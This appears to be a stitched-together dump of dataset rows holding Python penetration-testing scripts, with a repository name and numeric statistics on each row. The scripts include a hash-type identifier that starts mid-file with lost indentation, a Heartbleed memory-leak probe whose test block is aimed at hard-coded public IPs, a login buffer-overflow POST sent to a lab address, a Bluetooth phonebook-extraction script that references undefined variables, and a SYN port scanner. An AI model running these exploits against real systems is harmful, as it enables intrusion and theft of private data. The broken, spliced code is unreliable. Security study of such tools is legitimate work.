if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s():
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django():
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
print " [+] SHA-384(Django)"
jerar.append("121020")
def SHA512():
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC():
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool():
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC():
    """Flag the input as a possible HMAC-Whirlpool digest (128 hex characters)."""
    sample = '77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
    looks_hex = hash.isalnum() and not hash.isdigit() and not hash.isalpha()
    if len(hash) == len(sample) and looks_hex:
        jerar.append("122080")
print logo

# Interactive loop: read one hash string per iteration, run every detector,
# then rank the candidate algorithms collected in ``jerar``.
while True:
    # Candidate algorithm ids for this input; each detector function appends
    # an id string (sorted ids roughly order candidates by likelihood).
    jerar=[]
    print """
 -------------------------------------------------------------------------"""
    # NOTE(review): this global deliberately(?) shadows the builtin hash().
    hash = raw_input(" HASH: ")
    # Run every detector; each inspects the global ``hash`` and may append to ``jerar``.
    ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
    if len(jerar)==0:
        # No detector matched the input at all.
        print ""
        print " Not Found."
    elif len(jerar)>2:
        # Three or more matches: show the two best candidates first,
        # then the remainder as less likely.
        jerar.sort()
        print ""
        print "Possible Hashs:"
        print "[+] ",algorithms[jerar[0]]
        print "[+] ",algorithms[jerar[1]]
        print ""
        print "Least Possible Hashs:"
        for a in range(int(len(jerar))-2):
            print "[+] ",algorithms[jerar[a+2]]
    else:
        # One or two matches: list them all as equally possible.
        jerar.sort()
        print ""
        print "Possible Hashs:"
        for a in range(len(jerar)):
            print "[+] ",algorithms[jerar[a]]
| 57.72695 | 3,696 | 0.685879 |
PenetrationTestingScripts | #!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
    """Heartbleed (CVE-2014-0160) checker.

    Sends a canned TLS ClientHello followed by a malformed heartbeat request
    to every ``ip:port`` entry in ``ipdict['ssl']`` and records servers that
    echo back more data than was sent (i.e. leak process memory).
    """
    def __init__(self,c):
        # c: shared config object; only its write_file() is used, in run().
        self.config=c
        self.lock=threading.Lock()   # serializes console output and self.result
        self.result=[]               # human-readable findings, flushed to file in run()
        # Canned TLSv1.1 ClientHello (record type 0x16, version 03 02) with a
        # broad cipher list and the heartbeat extension (00 0f) enabled.
        # h2bin() strips all spaces/newlines, so the layout here is cosmetic.
        self.hello = self.h2bin('''
        16 03 02 00 dc 01 00 00 d8 03 02 53
        43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
        bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
        00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
        00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
        c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
        c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
        c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
        c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
        00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
        03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
        00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
        00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
        00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
        00 0f 00 01 01
        ''')
        # Malformed heartbeat request (record type 0x18): declares a payload
        # length of 0x4000 but carries none -- a vulnerable server echoes back
        # up to 16 KB of whatever is in its memory.
        self.hb = self.h2bin('''
        18 03 02 00 03
        01 40 00
        ''')
    def h2bin(self,x):
        """Convert a whitespace-formatted hex dump into a raw byte string."""
        return x.replace(' ', '').replace('\n', '').decode('hex')
    def recvall(self,s, length, timeout=8):
        """Read exactly *length* bytes from socket *s*.

        Uses select() so a stalled peer cannot block forever; returns None if
        the deadline expires or the peer closes the connection early.
        """
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time()
            if rtime < 0:
                # Overall deadline passed without receiving the full payload.
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata
    def recvmsg(self,s):
        """Read one TLS record; return (type, version, payload) or (None, None, None)."""
        hdr = self.recvall(s, 5)
        if hdr is None:
            return None, None, None
        # TLS record header: 1-byte type, 2-byte version, 2-byte payload length.
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = self.recvall(s, ln, 10)
        return typ, ver, pay
    def hit_hb(self,s,ip,port):
        """Send the malformed heartbeat and classify the server's reaction.

        Returns True when a heartbeat response (record type 24) came back:
        an oversized payload marks the server vulnerable.  A TLS alert
        (type 21) or a dead connection returns False.
        """
        s.send(self.hb)
        while True:
            typ, ver, pay = self.recvmsg(s)
            if typ is None:
                return False
            if typ == 24:
                if len(pay) > 3:
                    # More bytes than the 3 we sent: server leaked memory.
                    self.lock.acquire()
                    printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
                    self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
                    self.lock.release()
                else:
                    self.lock.acquire()
                    printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
                    self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
                    self.lock.release()
                return True
            if typ == 21:
                # TLS alert record: server rejected the malformed heartbeat.
                return False
    def openssl_test(self,ip,port):
        """Handshake with ip:port, then run the heartbeat probe.

        All errors (refused connections, timeouts, ...) are deliberately
        swallowed so one bad host cannot abort the scan.
        """
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sys.stdout.flush()
            s.connect((ip, port))
            sys.stdout.flush()
            s.send(self.hello)
            sys.stdout.flush()
            # Drain handshake records until the ServerHelloDone
            # (handshake record, first payload byte 0x0E) or EOF.
            while True:
                typ, ver, pay = self.recvmsg(s)
                if typ == None:
                    break
                # Look for server hello done message.
                if typ == 22 and ord(pay[0]) == 0x0E:
                    break
            sys.stdout.flush()
            s.send(self.hb)
            self.hit_hb(s,ip,port)
        except Exception,e:
            #print e
            pass
    def run(self,ipdict,pinglist,threads,file):
        """Probe every 'ip:port' string in ipdict['ssl'] with a worker pool.

        :param ipdict:   dict of service name -> list of 'ip:port' strings
        :param pinglist: unused here; kept for interface parity with sibling scanners
        :param threads:  worker pool size
        :param file:     report path handed to config.write_file()
        """
        if len(ipdict['ssl']):
            printPink("crack ssl now...")
            print "[*] start test openssl_heart %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['ssl']:
                pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()
            print "[*] stop ssl serice %s" % time.ctime()
            print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
            # Persist the findings gathered by the worker threads.
            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
    # Ad-hoc smoke test: run the Heartbleed checker against one hard-coded host.
    import sys
    sys.path.append("../")
    from comm.config import *

    conf = config()
    targets = {'ssl': ['222.22.224.142:443']}
    alive_hosts = ['122.225.81.129']
    checker = ssl_burp(conf)
    checker.run(targets, alive_hosts, 50, file="../result/test")
| 32.773973 | 136 | 0.495943 |
cybersecurity-penetration-testing | import argparse
import json
import logging
import sys
import os
import urllib2
import unix_converter as unix
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150920'
__version__ = 0.02
__description__ = 'This scripts downloads address transactions using blockchain.info public APIs'
def main(address):
    """
    Coordinate the lookup: fetch the raw JSON for the address, decode it,
    and print the account's transaction history.
    :param address: The Bitcoin Address to lookup
    :return: Nothing
    """
    logging.info('Initiated program for {} address'.format(address))
    logging.info('Obtaining JSON structured data from blockchain.info')
    response = getAddress(address)
    account_data = json.loads(response.read())
    printTransactions(account_data)
def getAddress(address):
"""
The getAddress function uses the blockchain.info Data API to pull
pull down account information and transactions for address of interest
:param address: The Bitcoin Address to lookup
:return: The response of the url request
"""
url = 'https://blockchain.info/address/{}?format=json'.format(address)
try:
return urllib2.urlopen(url)
except urllib2.URLError, e:
logging.error('URL Error for {}'.format(url))
if hasattr(e, 'code') and hasattr(e, 'headers'):
logging.debug('{}: {}'.format(e.code, e.reason))
logging.debug('{}'.format(e.headers))
print 'Received URL Error for {}'.format(url)
logging.info('Program exiting...')
sys.exit(1)
def printTransactions(account):
"""
The print_transaction function is responsible for presenting transaction details to end user.
:param account: The JSON decoded account and transaction data
:return: Nothing
"""
logging.info('Printing account and transaction data to console.')
printHeader(account)
print 'Transactions'
for i, tx in enumerate(account['txs']):
print 'Transaction #{}'.format(i)
print 'Transaction Hash:', tx['hash']
print 'Transaction Date: {}'.format(unix.unixConverter(tx['time']))
for output in tx['out']:
inputs = getInputs(tx)
if len(inputs) > 1:
print '{} --> {} ({:.8f} BTC)'.format(' & '.join(inputs), output['addr'], output['value'] * 10**-8)
elif len(inputs) == 1:
print '{} --> {} ({:.8f} BTC)'.format(''.join(inputs), output['addr'], output['value'] * 10**-8)
else:
logging.warn('Detected 0 inputs for transaction {}').format(tx['hash'])
print 'Detected 0 inputs for transaction.'
print '{:=^22}\n'.format('')
def printHeader(account):
"""
The printHeader function prints overall header information
containing basic address information.
:param account: The JSON decoded account and transaction data
:return: Nothing
"""
print 'Address:', account['address']
print 'Current Balance: {:.8f} BTC'.format(account['final_balance'] * 10**-8)
print 'Total Sent: {:.8f} BTC'.format(account['total_sent'] * 10**-8)
print 'Total Received: {:.8f} BTC'.format(account['total_received'] * 10**-8)
print 'Number of Transactions:', account['n_tx']
print '{:=^22}\n'.format('')
def getInputs(tx):
    """
    Collect the input addresses of a single Bitcoin transaction.
    :param tx: A single instance of a Bitcoin transaction
    :return: list of input address strings
    """
    return [entry['prev_out']['addr'] for entry in tx['inputs']]
if __name__ == '__main__':
# Run this code if the script is run from the command line.
parser = argparse.ArgumentParser(description='BTC Address Lookup', version=str(__version__),
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('ADDR', help='Bitcoin Address')
parser.add_argument('-l', help='Specify log directory. Defaults to current working directory.')
args = parser.parse_args()
# Set up Log
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'btc_addr_lookup.log')
else:
log_path = 'btc_addr_lookup.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='w')
logging.info('Starting Bitcoin Address Lookup v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
# Print Script Information
print '{:=^22}'.format('')
print '{} {}'.format('Bitcoin Address Lookup, ', __version__)
print '{:=^22} \n'.format('')
# Run main program
main(args.ADDR)
| 35.348485 | 115 | 0.625808 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket

# Padding for the vulnerable "username" field.  The original script shipped
# with the bare statement "junk =" -- a SyntaxError that prevented it from
# running at all.  Restored with an explicit filler string; tune the length
# to the overflow offset being tested (100 is a placeholder -- confirm).
junk = "A" * 100

# HTTP POST body: oversized username plus a dummy password.
payload = "username=" + junk + "&password=A"

# Hand-built HTTP request so Content-Length always matches the crafted body.
# (Renamed from "buffer", which shadows the Python 2 builtin of that name.)
request = "POST /login HTTP/1.1\r\n"
request += "Host: 192.168.129.128\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Referer: http://192.168.129.128/login\r\n"
request += "Connection: close\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "Content-Length: " + str(len(payload)) + "\r\n"
request += "\r\n"
request += payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(request)
s.close()
| 28 | 94 | 0.696133 |
Python-Penetration-Testing-Cookbook | import pyshark
# Open a saved capture file; FileCapture parses packets via tshark.
cap = pyshark.FileCapture('sample.pcap')
# The capture object and the first packet both have informative reprs.
print(cap)
print(cap[0])
# List every attribute/method available on a packet object.
print(dir(cap[0]))
# Walk all packets; the loop body (printing each packet's highest protocol
# layer) continues on the following line of the file.
for pkt in cap:
print(pkt.highest_layer) | 16.875 | 40 | 0.732394 |
cybersecurity-penetration-testing | # Guidance Test Python Application
# pyBasic.py
#
# Author: C. Hosmer
# Python Fornesics, Inc.
#
# May 2015
# Version 1.0
#
'''
Copyright (c) 2015 Chet Hosmer, Python Forensics
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
import argparse # Python Standard Library : Argument Parsing
import time # Python Standard Library : Time methods
import os # Python Standard Library : Operating System Methods
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
theFile = args.file
print "Test Python Application integrated with EnCase v7"
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
macTimes = []
macTimes.append(time.ctime(theFileStat.st_mtime))
macTimes.append(time.ctime(theFileStat.st_atime))
macTimes.append(time.ctime(theFileStat.st_ctime))
# get and store the File size
fileSize = theFileStat.st_size
print "Filename : ", theFile
print "Filesize : ", fileSize
print "Last Modified: ", macTimes[0]
print "Last Access : ", macTimes[1]
print "Created : ", macTimes[2]
| 29.350877 | 103 | 0.705032 |
cybersecurity-penetration-testing | #!/usr/bin/python
import string

# Atbash maps A<->Z, B<->Y, ...: build a translation table pairing the
# alphabet with its reversal (upper- and lower-case handled separately).
# The local was renamed from "input", which shadows the builtin.
plaintext = raw_input("Please enter the value you would like to Atbash Ciper: ")
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
mirrored = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba"
transform = string.maketrans(alphabet, mirrored)
final = plaintext.translate(transform)
print final | 24.833333 | 76 | 0.81877 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import bluetooth
tgtPhone = 'AA:BB:CC:DD:EE:FF'
port = 17
phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
phoneSock.connect((tgtPhone, port))
for contact in range(1, 5):
atCmd = 'AT+CPBR=' + str(contact) + '\n'
phoneSock.send(atCmd)
result = client_sock.recv(1024)
print '[+] ' + str(contact) + ' : ' + result
sock.close()
| 19.789474 | 55 | 0.639594 |
cybersecurity-penetration-testing | import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import sys
from scapy.all import *
if len(sys.argv) !=4:
print "usage: %s target startport endport" % (sys.argv[0])
sys.exit(0)
target = str(sys.argv[1])
startport = int(sys.argv[2])
endport = int(sys.argv[3])
print "Scanning "+target+" for open TCP ports\n"
if startport==endport:
endport+=1
for x in range(startport,endport):
packet = IP(dst=target)/TCP(dport=x,flags="S")
response = sr1(packet,timeout=0.5,verbose=0)
if response.haslayer(TCP) and response.getlayer(TCP).flags == 0x12:
print "Port "+str(x)+" is open!"
sr(IP(dst=target)/TCP(dport=response.sport,flags="R"),timeout=0.5, verbose=0)
print "Scan complete!\n" | 30.5 | 82 | 0.668874 |